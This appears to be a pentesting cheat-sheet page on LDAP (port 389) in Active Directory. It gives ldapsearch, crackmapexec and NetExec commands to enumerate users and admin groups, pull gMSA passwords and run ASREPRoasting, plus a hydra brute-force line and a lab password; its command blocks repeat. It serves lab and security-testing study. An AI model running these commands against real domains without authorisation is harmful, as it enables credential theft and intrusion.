389 ) LDAP

GUI jxplorer
General enumeration

#  -x Simple Authentication
#  -D UserName
#  -w Password
#  -b Base site

## ------------------| Simple Auth
ldapsearch -x -H ldap://<IP> 

## ------------------| Get LDAP Naming Context (DN)
ldapsearch -x -s base namingcontexts -H ldap://<IP>

## ------------------| Enum 
ldapsearch -x -b "DC=<SUBDOMAIN>,DC=<TDL>" -H ldap://<IP>
ldapsearch -x -b "DC=<SUBDOMAIN>,DC=<TDL>" -H ldap://<IP> -D '<DOMAIN>\<USER>' -w 'PassWord'
ldapsearch -x -b "DC=<SUBDOMAIN>,DC=<TDL>" -H ldap://<IP> -D '<DOMAIN>\ldap' -w 'PassWord'

## ------------------| Queries
ldapsearch -x -H ldap://<IP> -b "DC=htb,DC=local" '(objectClass=Person)'
ldapsearch -x -H ldap://<IP> -b "DC=htb,DC=local" '(objectClass=User)' sAMAccountName | grep sAMAccountName  

## ------------------| Grep only domain admins
ldapsearch -x -H ldap://<IP> -b "DC=HTB,DC=LOCAL"  -D '<DOMAIN>\<USER>' -w 'Ashare1972' "(&(ObjectClass=user)(memberOf=CN=Domain Admins,CN=Users,DC=htb,DC=local))" | grep sAMAccountName        

## ------------------| Extract users
-b "CN=Users,DC=<SUBDOMAIN>,DC=<TDL>"

## ------------------| Extract computers
-b "CN=Computers,DC=<SUBDOMAIN>,DC=<TDL>"       

## ------------------| Extract self info
 -b "CN=<MY NAME>,CN=Users,DC=<SUBDOMAIN>,DC=<TDL>"

## ------------------| Extract Domain Admins
-b "CN=Domain Admins,CN=Users,DC=<SUBDOMAIN>,DC=<TDL>"

## ------------------| Extract Domain Users
-b "CN=Domain Users,CN=Users,DC=<SUBDOMAIN>,DC=<TDL>"

## ------------------| Extract Enterprise Admins
-b "CN=Enterprise Admins,CN=Users,DC=<SUBDOMAIN>,DC=<TDL>"

## ------------------| Extract Administrators
-b "CN=Administrators,CN=Builtin,DC=<SUBDOMAIN>,DC=<TDL>"

## ------------------| Extract Remote Desktop Group
-b "CN=Remote Desktop Users,CN=Builtin,DC=<SUBDOMAIN>,DC=<TDL>"

Enumerate password policy.

crackmapexec smb 10.10.10.161 --pass-pol

# Null authuntication
crackmapexec smb 10.10.10.161 --pass-pol -u '' -p ''

NetExec Enumaration

## ------------------| If an account exists without kerberos protocol
nxc ldap <TARGET_IP> -u users.txt -p '' -k

## ------------------| Enumerate All Users
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' --users

## ------------------| Enumerate Active Users
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' --active-users

## ------------------| Enumerate Computers
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M find-computer

## ------------------| Enumerate Domain Admins
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M group-mem -o GROUP='Domain Admins'

## ------------------| Enumerate Domain Users
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M group-mem -o GROUP='Domain Users'

## ------------------| Enumerate Enterprise Admins
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M group-mem -o GROUP='Enterprise Admins'

## ------------------| Enumerate Administrators
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M group-mem -o GROUP='Administrators'

## ------------------| Enumerate Remote Desktop Users
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M group-mem -o GROUP='Remote Desktop Users'

## ------------------| Extract Self Information
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M whoami

## ------------------| Enumerate Users Trusted for Delegation
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' --trusted-for-delegation

## ------------------| Enumerate Users Without Passwords
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' --password-not-required

## ------------------| Enumerate Accounts with Admin Count
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' --admin-count

## ------------------| Enumerate Group Memberships
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M groupmembership -o USER='<TARGET_USER>'

## ------------------| Enumerate Subnets
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M subnets

## ------------------| Enumerate Domain Trusts
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M enum_trusts

## ------------------| Check LDAP Signing Requirements
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M ldap-checker

## ------------------| Extract Group Managed Service Account (gMSA) Passwords
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' --gmsa

## ------------------| Perform ASREPRoasting Attack
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '' --asreproast <OUTPUT_FILE>

Brute Force

 hydra -l UserName -P Passwordlist <IP> ldap2 -V -f

Last updated 2 months ago

Was this helpful?

# -x Simple Authentication # -D UserName # -w Password # -b Base site ## ------------------| Simple Auth ldapsearch -x -H ldap://<IP> ## ------------------| Get LDAP Naming Context (DN) ldapsearch -x -s base namingcontexts -H ldap://<IP> ## ------------------| Enum ldapsearch -x -b "DC=<SUBDOMAIN>,DC=<TDL>" -H ldap://<IP> ldapsearch -x -b "DC=<SUBDOMAIN>,DC=<TDL>" -H ldap://<IP> -D '<DOMAIN>\<USER>' -w 'PassWord' ldapsearch -x -b "DC=<SUBDOMAIN>,DC=<TDL>" -H ldap://<IP> -D '<DOMAIN>\ldap' -w 'PassWord' ## ------------------| Queries ldapsearch -x -H ldap://<IP> -b "DC=htb,DC=local" '(objectClass=Person)' ldapsearch -x -H ldap://<IP> -b "DC=htb,DC=local" '(objectClass=User)' sAMAccountName | grep sAMAccountName ## ------------------| Grep only domain admins ldapsearch -x -H ldap://<IP> -b "DC=HTB,DC=LOCAL" -D '<DOMAIN>\<USER>' -w 'Ashare1972' "(&(ObjectClass=user)(memberOf=CN=Domain Admins,CN=Users,DC=htb,DC=local))" | grep sAMAccountName ## ------------------| Extract users -b "CN=Users,DC=<SUBDOMAIN>,DC=<TDL>" ## ------------------| Extract computers -b "CN=Computers,DC=<SUBDOMAIN>,DC=<TDL>" ## ------------------| Extract self info -b "CN=<MY NAME>,CN=Users,DC=<SUBDOMAIN>,DC=<TDL>" ## ------------------| Extract Domain Admins -b "CN=Domain Admins,CN=Users,DC=<SUBDOMAIN>,DC=<TDL>" ## ------------------| Extract Domain Users -b "CN=Domain Users,CN=Users,DC=<SUBDOMAIN>,DC=<TDL>" ## ------------------| Extract Enterprise Admins -b "CN=Enterprise Admins,CN=Users,DC=<SUBDOMAIN>,DC=<TDL>" ## ------------------| Extract Administrators -b "CN=Administrators,CN=Builtin,DC=<SUBDOMAIN>,DC=<TDL>" ## ------------------| Extract Remote Desktop Group -b "CN=Remote Desktop Users,CN=Builtin,DC=<SUBDOMAIN>,DC=<TDL>"

## ------------------| If an account exists without kerberos protocol nxc ldap <TARGET_IP> -u users.txt -p '' -k ## ------------------| Enumerate All Users nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' --users ## ------------------| Enumerate Active Users nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' --active-users ## ------------------| Enumerate Computers nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M find-computer ## ------------------| Enumerate Domain Admins nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M group-mem -o GROUP='Domain Admins' ## ------------------| Enumerate Domain Users nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M group-mem -o GROUP='Domain Users' ## ------------------| Enumerate Enterprise Admins nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M group-mem -o GROUP='Enterprise Admins' ## ------------------| Enumerate Administrators nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M group-mem -o GROUP='Administrators' ## ------------------| Enumerate Remote Desktop Users nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M group-mem -o GROUP='Remote Desktop Users' ## ------------------| Extract Self Information nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M whoami ## ------------------| Enumerate Users Trusted for Delegation nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' --trusted-for-delegation ## ------------------| Enumerate Users Without Passwords nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' --password-not-required ## ------------------| Enumerate Accounts with Admin Count nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' --admin-count ## ------------------| Enumerate Group Memberships nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M groupmembership -o USER='<TARGET_USER>' ## ------------------| Enumerate Subnets nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M subnets ## ------------------| Enumerate Domain Trusts nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M enum_trusts ## ------------------| Check LDAP Signing Requirements nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M ldap-checker ## ------------------| Extract Group Managed Service Account (gMSA) Passwords nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' --gmsa ## ------------------| Perform ASREPRoasting Attack nxc ldap <TARGET_IP> -u '<USERNAME>' -p '' --asreproast <OUTPUT_FILE>